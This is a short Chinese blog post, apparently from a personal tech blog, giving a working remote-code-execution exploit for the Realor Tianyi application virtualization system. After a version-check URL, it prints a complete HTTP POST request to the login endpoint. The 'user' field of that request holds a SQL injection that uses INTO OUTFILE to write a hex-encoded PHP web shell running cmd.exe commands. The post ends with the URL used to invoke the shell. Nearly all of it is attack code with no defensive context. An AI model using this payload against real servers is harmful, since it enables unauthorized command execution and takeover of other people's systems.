瑞友天翼应用虚拟化系统RCE漏洞

查看版本

/RAPAgent.XGI?CMD=GetRegInfo

构造数据包造写入木马

POST /AgentBoard.XGI?cmd=UserLogin HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 824
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

user=%27%7C%7C%271%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27..%2F..%2FWebRoot%2F11.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a2020202020202020202020202020202020202020247068707773683d6e657720434f4d2822577363726970742e5368656c6c2229206f7220646965282243726561746520577363726970742e5368656c6c204661696c65642122293b20200a202020202020202020202020202020202020202024657865633d247068707773682d3e657865632822636d642e657865202f6320222e245f524551554553545b27636d64275d2e2222293b20200a2020202020202020202020202020202020202020247374646f7574203d2024657865632d3e5374644f757428293b20200a2020202020202020202020202020202020202020247374726f7574707574203d20247374646f75742d3e52656164416c6c28293b20200a20202020202020202020202020202020202020206563686f20247374726f75747075743b6578697428293b0a20202020202020202020202020202020202020203f3e--%20-

http://xx.com/11.php?cmd=dir

posted @ 2025-07-15 16:39 x3c 阅读(71) 评论(0) 收藏举报

刷新页面返回顶部

x3cc

瑞友天翼应用虚拟化系统RCE漏洞

公告